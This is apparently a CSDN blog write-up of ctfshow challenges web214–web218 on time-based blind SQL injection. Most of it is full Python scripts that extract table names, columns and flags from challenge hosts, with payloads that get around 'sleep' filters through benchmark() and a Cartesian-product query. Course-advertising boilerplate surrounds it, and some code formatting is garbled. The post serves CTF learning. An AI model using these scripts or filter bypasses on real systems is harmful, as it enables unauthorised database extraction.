网络安全最全ctfshow-web延时注入平替-web217~web220(2),2024年最新2024最新网络安全开发面试大全

于 2024-05-14 19:14:00 发布
阅读量795 收藏 15
点赞数 27
分类专栏: 程序员 文章标签: 网络安全 学习 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84252743/article/details/138866544
版权

学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

def GetData2(url,payload,flag=“”,timeout=3,start=1,end=50,flagStrDict=“{}ctfshow-0123456789abdegijklmnpqruvxyz”):
urls = url + “api/”
headers = {
“Content-Type”: “application/x-www-form-urlencoded;charset=UTF-8”,
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0”,
“Accept”: “application/json, text/javascript, */*; q=0.01”,
“Accept-Language”: “zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2”,
“Accept-Encoding”: “gzip, deflate”,
“Connection”: “keep-alive”,
“X-Requested-With”: “XMLHttpRequest”,
“Origin”: url,
“Referer”: url,
“Cookie”: “PHPSESSID=jq29mbfflirbma38u1sr7u5i3f”,
}
for i in range(start,end):
mf = 0
for mid in flagStrDict:

        data = {
            "ip":payload.format(i,mid),
            "debug":1
        }

        try:
            t = time.time()
            req = requests.post(url=urls, headers=headers, data=data,timeout=timeout)
            endTime = time.time() - t
            time.sleep(0.3)
            mf += 1
            print(f"find time: {int(endTime)} s \t and find payload: {payload.format(i,mid)}")
        except Exception as e:
            flag += mid
            print(flag)
            break

            # print(payload.format(i,mid))
    if mf == len(flagStrDict):
        print("flag is :"+flag)
        break

if name == “__main__”:
# find database/tables/columns
flagStrDict1 = “ctfshow,_0123456789abdegijklmnpqruvxyz”
# find flag
flagStrDict2 = “{}ctfshow-0123456789abdegijklmnpqruvxyz”

def web214():
    url = "http://13f1f1cf-dc0b-44ec-ac58-65536d39760f.challenge.ctf.show/"
    # find tables
    payload1 = "if(mid((select(group\_concat(table\_name))from(information\_schema.tables)where(table\_schema=database())),{},1)='{}',sleep(3),1)"
    # find columns
    payload2 = "if(mid((select(group\_concat(column\_name))from(information\_schema.columns)where(table\_name='ctfshow\_flagx')),{},1)='{}',sleep(3),1)"
    # find flag
    payload3 = "if(substring((select flaga from ctfshow\_flagx),{},1)='{}',sleep(3),1)"
    # GetData2(url,payload=payload1,flagStrDict=flagStrDict1)
    # GetData2(url,payload=payload2,flagStrDict=flagStrDict1)
    GetData2(url,payload=payload3,flagStrDict=flagStrDict2,start=1,end=55)

web214()


## web215


### 原始信息


开始基于时间盲注


查询语句

//用了单引号


返回逻辑

//屏蔽危险分子


### 解题


测试的时候不是过滤了单引号,而是新增了单引号。


下面是脚本:

coding=utf-8

import requests,time

def GetData2(url,payload,flagStrDict,flag=“”,timeout=3,start=1,end=50,mode=1):
urls = url + “api/”
headers = {
“Content-Type”: “application/x-www-form-urlencoded;charset=UTF-8”,
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0”,
“Accept”: “application/json, text/javascript, */*; q=0.01”,
“Accept-Language”: “zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2”,
“Accept-Encoding”: “gzip, deflate”,
“Connection”: “keep-alive”,
“X-Requested-With”: “XMLHttpRequest”,
“Origin”: url,
“Referer”: url,
“Cookie”: “PHPSESSID=jq29mbfflirbma38u1sr7u5i3f”,
}
for i in range(start,end):
mf = 0
for mid in flagStrDict:

        data = {
            "ip":payload.format(i,mid),
            "debug":1
        }

        try:
            t = time.time()
            req = requests.post(url=urls, headers=headers, data=data,timeout=timeout)
            endTime = time.time() - t
            time.sleep(0.3)
            mf += 1
            print(f"find time: {int(endTime)} s \t and find payload: {payload.format(i,mid)}")
            # print(req.content)
        except Exception as e:
            if mode == 1:
                flag += mid
            elif mode == 2:
                flag += chr(int(mid,16))
            print(flag)
            break
    if mf == len(flagStrDict):
        print("flag is :"+flag)
        break

if name == “__main__”:
# find database/tables/columns
flagStrDict1 = “ctfshow,_0123456789abdegijklmnpqruvxyz”
# find flag
flagStrDict2 = “-0123456789abdectfshowgijklmnpqruvxyz}{,_”

def web215():
    url = "http://d86b4db8-c487-4cde-8209-1e104d9d5e51.challenge.ctf.show/"
    payload1 = "select(group\_concat(table\_name))from(information\_schema.tables)where(table\_schema=database())"
    payload2 = "select(group\_concat(column\_name))from(information\_schema.columns)where(table\_name='ctfshow\_flagxc')"
    payload3 = "select flagaa from ctfshow\_flagxc"
    # id,flagaa,info
    # GetData2(url,payload="'||if(mid(("+payload1+"),{},1)='{}',sleep(3),1)||'",flagStrDict=flagStrDict1,timeout=5)
    # GetData2(url,payload="'||if(mid(("+payload2+"),{},1)='{}',sleep(3),1)||'",flagStrDict=flagStrDict1,timeout=5)
    GetData2(url,flag='ctfshow{',start=9,end=55,payload="'||if(mid(("+payload3+"),{},1)='{}',sleep(5),1)||'",flagStrDict=flagStrDict2,timeout=5)

web215()


## web216


### 原始信息


查询语句




   where id = from\_base64($id);


返回逻辑

//屏蔽危险分子


### 解题


照搬上一题脚本,修改未多线程爆破:

coding=utf-8

import requests,threading,time,concurrent.futures
“”"
多线程爆破脚本(省时间脚本)
“”"

def send_request(url,headers,data,timeout,strs):
try:
req = requests.post(url=url, headers=headers, data=data, timeout=timeout)
time.sleep(0.3)
except Exception as e:
return strs
return “”

def GetData3(url,payload,flagStrDict,flag=“”,timeout=3,start=1,end=50,threadNum=3):
urls = url + “api/”
headers = {
“Content-Type”: “application/x-www-form-urlencoded;charset=UTF-8”,
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0”,
“Accept”: “application/json, text/javascript, */*; q=0.01”,
“Accept-Language”: “zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2”,
“Accept-Encoding”: “gzip, deflate”,
“Connection”: “keep-alive”,
“X-Requested-With”: “XMLHttpRequest”,
“Origin”: url,
“Referer”: url,
“Cookie”: “PHPSESSID=jq29mbfflirbma38u1sr7u5i3f”,
}
allList = []
flagStr = ‘’
for index in range(start,end):
dataList = [[{‘ip’: payload.format(index, strsDict), ‘debug’: 1},f"{index}:{strsDict}"] for strsDict in flagStrDict]
with concurrent.futures.ThreadPoolExecutor(max_workers=threadNum) as executor:
tasks = []
for data in dataList:
task = executor.submit(send_request, urls,headers,data[0],timeout,data[1])
tasks.append(task)

        # 处理返回结果
        results = []

        for task in tasks:
            result = task.result()
            if result:
                flagStr += (result.split(':'))[1]
                results.append(result)
    if results:
        allList.append(results)
    else:
        break
    print(flagStr)
string = flag
for i in allList:
    if i!=[] or i!=[[]] or bool(i):
        string += (i[0].split(':'))[-1]
print('flag: ',string)

if name == “__main__”:
# find database/tables/columns
flagStrDict1 = “ctfshow,_0123456789abdegijklmnpqruvxyz”
# find flag
flagStrDict2 = “-0123456789abdectfshowgijklmnpqruvxyz}{,_”

def web216():
    url = "http://8c908286-df0a-42c6-8fe7-c94445d8f432.challenge.ctf.show/"
    payload1 = "select(group\_concat(table\_name))from(information\_schema.tables)where(table\_schema=database())"
    payload2 = "select(group\_concat(column\_name))from(information\_schema.columns)where(table\_name='ctfshow\_flagxcc')"
    payload3 = "select(group\_concat(flagaac))from(ctfshow\_flagxcc)"
    # ctfshow\_flagxcc,ctfshow\_info
    # GetData3(url,payload="to\_base64({})".format("if(mid(("+payload1+"),{},1)='{}',sleep(5),1)"),flagStrDict=flagStrDict1,timeout=5)
    # id,flagaac,info
    # GetData3(url,payload="to\_base64({})".format("if(mid(("+payload2+"),{},1)='{}',sleep(5),1)"),flagStrDict=flagStrDict1,timeout=5)
    GetData3(url, flag='ctfshow{', start=9, end=55,payload="to\_base64({})".format("if(mid(("+payload3+"),{},1)='{}',sleep(5),1)"), flagStrDict=flagStrDict2, timeout=5)

web216()


payload部分在于:

def web216():
url = “http://8c908286-df0a-42c6-8fe7-c94445d8f432.challenge.ctf.show/”
payload1 = “select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())”
payload2 = “select(group_concat(column_name))from(information_schema.columns)where(table_name=‘ctfshow_flagxcc’)”
payload3 = “select(group_concat(flagaac))from(ctfshow_flagxcc)”
# ctfshow_flagxcc,ctfshow_info
# GetData3(url,payload=“to_base64({})”.format(“if(mid((”+payload1+“),{},1)=‘{}’,sleep(5),1)”),flagStrDict=flagStrDict1,timeout=5)
# id,flagaac,info
# GetData3(url,payload=“to_base64({})”.format(“if(mid((”+payload2+“),{},1)=‘{}’,sleep(5),1)”),flagStrDict=flagStrDict1,timeout=5)
GetData3(url, flag=‘ctfshow{’, start=9, end=55,payload=“to_base64({})”.format(“if(mid((”+payload3+“),{},1)=‘{}’,sleep(5),1)”), flagStrDict=flagStrDict2, timeout=5)


其中,要注意点在于:网络不好就没必要跑脚本了,因为实在……太依赖网络状态了。。。


半夜开了5G测试,一直出错误。同一个payload放BP跑了不到五分钟就全出来了,我……


## web217


### 原始信息


查询语句




   where id = ($id);


返回逻辑




//屏蔽危险分子
function waf($str){
    return preg\_match('/sleep/i',$str);
} 


### 解题


这个题目过滤了 `sleep` ,导致常用延时注入函数被过滤。这里对 `sleep` 的平替方案为:

select sleep(3):

平替为:

select benchmark(3500000,md5(‘www’));


具体的平替时间是测试出来的,使用 `Burp` 抓包出来进行平替测试即可。


具体测试方案就是:设置 `3s` 延迟,让后放上这种句子进行测试:`ip=if(1,benchmark(3500000,md5('www')),1)&debug=1` .


![测试](https://img-blog.csdnimg.cn/direct/8858c7edd5f142fcb8483d1859d93335.jpeg#pic_center)


脚本如下,注意网络环境对延时注入的影响。

coding=utf-8

import requests,time,concurrent.futures
“”"
多线程爆破脚本
“”"

def send_request(url,headers,data,timeout,strs):
try:
req = requests.post(url=url, headers=headers, data=data, timeout=timeout)
time.sleep(0.3)
except Exception as e:
return strs
return “”

def GetData3(url,payload,flagStrDict,flag=“”,timeout=3,start=1,end=50,threadNum=5):
urls = url + “api/”
headers = {
“Content-Type”: “application/x-www-form-urlencoded;charset=UTF-8”,
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0”,
“Accept”: “application/json, text/javascript, */*; q=0.01”,
“Accept-Language”: “zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2”,
“Accept-Encoding”: “gzip, deflate”,
“Connection”: “keep-alive”,
“X-Requested-With”: “XMLHttpRequest”,
“Origin”: url,
“Referer”: url,
“Cookie”: “PHPSESSID=jq29mbfflirbma38u1sr7u5i3f”,
}
allList = []
flagStr = flag
for index in range(start,end):
dataList = [[{‘ip’: payload.format(index, strsDict), ‘debug’: 1},f"{index}:{strsDict}"] for strsDict in flagStrDict]
with concurrent.futures.ThreadPoolExecutor(max_workers=threadNum) as executor:
tasks = []
for data in dataList:
task = executor.submit(send_request, urls,headers,data[0],timeout,data[1])
tasks.append(task)

        # 处理返回结果
        results = []

        for task in tasks:
            result = task.result()
            if result:
                flagStr += (result.split(':'))[1]
                # print([result],type(result))
                results.append(result)
    if results:
        allList.append(results)
    else:
        print("No results {}".format(index))
        break
    print(flagStr)
string = flag
for i in allList:
    if i!=[] or i!=[[]] or bool(i):
        string += (i[0].split(':'))[-1]
print('flag: ',string)
    # t = threading.Thread(target=send\_request,args=(urls,headers,data,timeout,flag,mid,i,payload))

if name == “__main__”:
# find database/tables/columns
flagStrDict1 = “ctfshow,_0123456789abdegijklmnpqruvxyz”
# find flag
flagStrDict2 = “-0123456789abdectfshowgijklmnpqruvxyz}{,_”

def web217():
    url = "http://4afe2ce4-af43-46e5-a9c1-79b4b85cb45f.challenge.ctf.show/"
    payload1 = "select(group\_concat(table\_name))from(information\_schema.tables)where(table\_schema=database())"
    payload2 = "select(group\_concat(column\_name))from(information\_schema.columns)where(table\_name='ctfshow\_flagxccb')"
    payload3 = "select(group\_concat(flagaabc))from(ctfshow\_flagxccb)"
    # ctfshow\_flagxccb,ctfshow\_info
    # GetData3(url,payload="{}".format("if(mid(("+payload1+"),{},1)='{}',benchmark(3500000,md5('www')),1)"),flagStrDict=flagStrDict1,timeout=5)
    # id,flagaabc,info
    # GetData3(url,flag='id,flag',start=8,payload="{}".format("if(mid(("+payload2+"),{},1)='{}',benchmark(3500000,md5('www')),1)"),flagStrDict=flagStrDict1,timeout=5)
    GetData3(url, flag='ctfshow{', start=9, end=55,payload="{}".format("if(mid(("+payload3+"),{},1)='{}',benchmark(3500000,md5('www')),1)"), flagStrDict=flagStrDict2, timeout=5)

web217()


## web218


### 原始信息


查询语句




   where id = ($id);


返回逻辑




//屏蔽危险分子
function waf($str){
    return preg\_match('/sleep|benchmark/i',$str);
}   


### 解题


这过滤……又要寻找平替方案……


还有一个平替方案,利用大量的查询消耗时间:

if(mid(1,(SELECT COUNT(*) FROM information_schema.tables a, information_schema.tables b, information_schema.tables c,information_schema.tables d),1)


其中的 `SELECT COUNT(*) FROM information_schema.tables a, information_schema.tables b, information_schema.tables c,information_schema.tables d` 便是起到平替作用的sql查询语句。(笛卡尔积)


如果是使用延迟2s的话,特别考验爆破者的网络环境。特别是这种情况下特别容易出现flag错误的情况。



> 
> 注意:这里的爆破延迟是1.7s,测试的具体方式是从Burp看回显时间测试出来的。
> 
> 
> 使用要求:
> 
> 
> 1. 测试者正常回显(非测试笛卡尔积)的情况下延迟在0到1s之间。
> 2. 测试者测试笛卡尔积的时候延迟在1.7或者大于1.7的范围。
> 
> 
> 


下面是脚本:

coding=utf-8

import requests,time,concurrent.futures
from colorama import Fore, Back, Style, init
init()

“”"
单线程爆破
“”"

def GetData5(url,payload,flagStrDict,flag=“”,timeout=3.0,start=1,end=50,mode=1):
“”"
单线程爆破
:param url:目标url
:param payload:payload模板
:param flagStrDict:flag字典
:param flag:flag
:param timeout:超时时间
:param start:开始
:param end:结束
:param mode:模式
:return:
“”"
urls = url + “api/”
headers = {
“Content-Type”: “application/x-www-form-urlencoded;charset=UTF-8”,
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0”,
“Accept”: “application/json, text/javascript, */*; q=0.01”,
“Accept-Language”: “zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2”,
“Accept-Encoding”: “gzip, deflate”,
“Connection”: “keep-alive”,
“X-Requested-With”: “XMLHttpRequest”,
“Origin”: url,
“Referer”: url,
“Cookie”: “PHPSESSID=jq29mbfflirbma38u1sr7u5i3f”,
}

thresholdNumber = 2
for i in range(start,end):
    mf = 0
    for mid in flagStrDict:

        data = {
            "ip":payload.format(i,mid),
            "debug":1
        }
        t1 = time.time()
        thresholds = 0

        # 使用数据包阈值来过滤废包
        # 经过测试,当前网络环境当中延迟1.7是笛卡尔积的极限。具体测试方法是把数据包转发到BP当中,尝试使用笛卡尔积直接发数据测试极限时间

        try:
            t = time.time()
            req = requests.post(url=urls, headers=headers, data=data,timeout=timeout)
            endTime = time.time() - t
            time.sleep(0.3)

            print(Style.BRIGHT+'find time',
                  Style.RESET_ALL +f": {endTime:.3f} s \t ",
                  Style.BRIGHT+'and find payload',
                  Style.RESET_ALL +f": {payload.format(i,mid)}"
                  )
            # print(req.content)
        except Exception as e:
            for threshold in range(thresholdNumber):
                try:
                    t = time.time()
                    req = requests.post(url=urls, headers=headers, data=data, timeout=timeout)
                    endTime = time.time() - t
                    time.sleep(0.3)

                    print(Style.BRIGHT + 'find time',
                          Style.RESET_ALL + f": {endTime:.3f} s \t ",
                          Style.BRIGHT + 'and find payload',
                          Style.RESET_ALL + f": {payload.format(i, mid)}"
                          )
                except Exception as e:
                    thresholds += 1
                    print(Fore.RED+'the number',Style.BRIGHT+f": {thresholds} ",Style.RESET_ALL + "-")

        endTime = time.time() - t1
        if mode == 1 and thresholds == thresholdNumber:
            flag += mid
            # print(f"index: {i}\t all time:{endTime:.3f}\t flag:{flag}")
            print(f"{Back.GREEN+'index'}: {i}","\t",f"{Back.GREEN+'all time'}:",Style.BRIGHT+f"{endTime:.3f}","\t ",Back.GREEN+'flag',":",Style.BRIGHT+f'{flag}',Style.RESET_ALL + "-")
            break
        elif mode == 2 and thresholds == thresholdNumber:
            flag += chr(int(mid,16))
            # print(f"{Back.GREEN+'index'}: {i}\t {Back.GREEN+'all time'}:{endTime:.3f}\t {Back.GREEN+'flag'}:{Style.BRIGHT+'flag'}",end=' ')
            print(f"{Back.GREEN+'index'}: {i}","\t",f"{Back.GREEN+'all time'}:",Style.BRIGHT+f"{endTime:.3f}","\t ",Back.GREEN+'flag',":",Style.BRIGHT+f'{flag}',Style.RESET_ALL + "-")
            print(Style.RESET_ALL + "-")
            break
        else:
            mf += 1

            # print(payload.format(i,mid))
    if mf == len(flagStrDict):
        print("flag is :"+flag)
        break

if name == “__main__”:
# find database/tables/columns
flagStrDict1 = “ctfshow,_0123456789abdegijklmnpqruvxyz”
# find flag
flagStrDict2 = “-0123456789abdectfshowgijklmnpqruvxyz}{,_”
flagStrDict3 = “id,flagah,infoctfshow,_0123456789abdegijklmnpqruvxyz”
flagStrDict4 = “id,flagno_0123456789bcehjkmpqrstuvwxyz”

def web218():
    url = "http://736e0672-8f98-43d0-ae4d-3660b56cfda7.challenge.ctf.show/"
    payload1 = "select(group\_concat(table\_name))from(information\_schema.tables)where(table\_schema=database())"
    payload2 = "select(group\_concat(column\_name))from(information\_schema.columns)where(table\_name='ctfshow\_flagxc')"
    payload3 = "select(group\_concat(flagaac))from(ctfshow\_flagxc)"

    timeOutFunction = "(SELECT COUNT(\*) FROM information\_schema.tables a, information\_schema.tables b, information\_schema.tables c)"

    # ctfshow\_flagxc,ctfshow\_info
    # GetData5(url,flag='ctfshow\_',start=9,payload="if(mid((" + payload1 + "),{},1)='{}',"+timeOutFunction+",1)",flagStrDict=flagStrDict1,timeout=1.7)
    # id,flagaac,info
    # GetData5(url,payload="if(mid((" + payload2 + "),{},1)='{}',"+timeOutFunction+",1)",flagStrDict=flagStrDict4,timeout=1.7)
    """

ctfshow{3e19223f-d564-4aae-945e-55a2656f1c27}
ctfshow{3e192230-d564-4aae-945e-56a2656f1c27}
ctfshow{3e19223f-d564-4aae-945e-56a2656f1c27}
“”"
GetData5(url,flag=‘ctfshow{’, start=9, end=55,payload=“if(mid((” + payload3 + “),{},1)=‘{}’,”+timeOutFunction+“,1)”,flagStrDict=flagStrDict2,timeout=1.7)

web218()


多跑两次,flag有一定概率会出错,测试的时候多测试两次不会吃亏。如果能一次提交正确就没必要测了。


## web219


### 原始信息


查询语句




   where id = ($id);


返回逻辑




//屏蔽危险分子

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:

在这里插入图片描述

因篇幅有限,仅展示部分资料

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84252743
关注
  • 27
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow sql注入 上篇(web171-220)
Kradress的博客
03-18 7127
目录前言题目web 171(万能密码)web 172(回显内容过滤,base64或者hex编码绕过)web 173(回显内容过滤,base64或者hex编码绕过)web 174 (盲注)总结 前言 师傅们加油!!! 题目 web 171(万能密码) //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; id存在注
SQL盲注(延时注入)
热门推荐
JKding123的博客
04-02 1万+
思路: *判断是否存在注入注入是字符型还是数字型 *猜解当前数据库名 *猜解数据库表名 *猜解字段名 *猜解数据 1判断注入类型 playload result 1’ and sleep(5) # 延迟 1 and sleep(5)# 没有延迟 存在字符型注入 2猜解当前数据库名 2.1猜解数据库名的长度: playload result 1’ and i...
CTF-Web30(延时盲注-难度大)
→_→
10-04 763
30.看起来有点难 分析: 一种方法直接使用工具Sqlmap直接跑出,username和password,然后登陆得到flag. 这里我们讲解另一种方法:延时盲注 测试?admin=1&pass=1&action=login报错,无法连接到数据库 测试?admin=admin'&pass=admin&action=login,报错,密码错误 这或许说明,admin=admin只要知道密码就行了。 这里本想直接用爆破,但是听说密码不是那种弱口令,或者...
ctfshow-web延时注入平替-web217~web220
weixin_44016181的博客
02-03 843
开始基于时间盲注查询语句//无返回逻辑//屏蔽危险分子。
CTF时间盲注(延时注入
wikey 的博客
03-29 359
id=1′ and if(ascii(substr(database(),第一个字母,1))=115,sleep(2),0) –+id=1′ and if(ascii(substr(database(),第二个字母,1))=101,sleep(2),0) –+id=1′ and if(length(database())>(一个数字),sleep(2),0) –+//判断库名长度。if(1=2,1,sleep(1))即延迟一秒后回显。if(1=1,1,sleep(1))即输出一。
ctfshow-web延时注入平替-web217~web220,程序员真的是吃青春饭吗
最新发布
m0_61331407的博客
04-07 268
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
ns.rar_ns-2.30_ns-random.tcl_ns2_ns2 latency_网络 延时
09-14
在IT领域,网络模拟是研究和优化网络性能的重要工具,NS-2是一个广泛使用的网络模拟器,它允许研究人员和工程师模拟各种网络环境并分析其行为。这篇关于"ns.rar"的压缩包文件提供了针对NS-2.30版本的一些关键分析...
Web应用安全:Mysql盲注.pptx
06-19
Web应用安全领域中,MySQL盲注是一种常见的安全漏洞,它发生在SQL注入攻击中,但攻击者无法直接看到数据库的响应结果。在这种情况下,攻击者必须通过观察页面加载时间、页面内容的变化或者其他间接方式来判断SQL查询...
wlpc.rar_CRAWL_java网络爬虫_web crawler_爬虫
09-19
网络爬虫,也被称为Web爬虫或Web机器人,是一种自动浏览互联网并抓取网页内容的程序。在Java中实现网络爬虫,可以让我们方便地获取大量网页数据,用于数据分析、信息提取、搜索引擎优化等多个领域。本项目“wlpc.rar...
实验吧-看起来有点难【基于sleep的sql注入脚本】
Sp4rkW的博客
08-05 5331
原题内容: 切,你那水平也就这么点了,这都是什么题啊!!! 解题链接:http://ctf5.shiyanbar.com/basic/inject 先吐槽下,,,,这题目开了嘲讽!!! 硬肝了一上午,肝出来就,其实题目挺简单的,写个博客记录下几个个人的失误点,下面为解题思路。 首先login很有意思,admin/admin告诉我用户名密码均错误: 然后试了试1/1,...
bugku-Web-INSERT INTO注入(case注入技巧(逗号被过滤的延迟盲注)+延迟注入脚本)
Sea_Sand息禅
03-31 1349
flag格式:flag{xxxxxxxxxxxx} 不如写个Python吧 error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $ip = $_SERVER['REM...
一次手工和工具的延时注入(时间注入
qq_42097777的博客
03-29 7242
延时注入的原理 适用于,无法回现和无法显示错误页面的场景 ##利用函数sleep()让服务器休眠,通过休眠时间判断执行的语句对错,从而得到我们想要的信息 1,判断当前库名的长度 and if (length(database())=8,0,sleep(5))#0 结果=8时网页没睡眠,可以判断当前库名有8个字符 2,猜库名 and if (ascii(substr(database(),1,1)...
CTF从入门到提升(三)基于时间的盲注及部分函数
anquanniu的博客
08-20 1787
本次内容会先介绍一些函数,然后结合一些题目进行讲解。这里的基于时间是指延时。 ​​我们对于盲注最早接触的应该就是SLEEP函数, 很多编程语言中都有它。函数的特点就是添加延时功能,我们可以看一下它的一个效果是什么样子的。 (在这里我做一个演示,如果大家想看可以到安全牛课堂的视频里看动手操作 CTF从入门到提升 课时3:1分10秒) 举栗子: 在添加了SLEEP函数之后,它的运行结果要是...
CTF web总结--sql注入
bob的博客
08-30 1612
<?php include "common.php";if (isset($_POST["name"])){ $name = str_replace("'", "", trim($_POST["name"])); if (strlen($name) > 10){ echo("<script>alert('too long')</script>"); }else{ $sql
网络安全初学者指南:信息收集与SQL注入
"网络安全技术课程.pdf" 是一份适合初学者的网络安全教材,共计258页,涵盖了实战案例。课程内容包括信息收集、SQL注入攻击、XSS跨站脚本攻击、后台弱口令、命令执行、文件上传漏洞等多个关键领域。 在第一章节...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值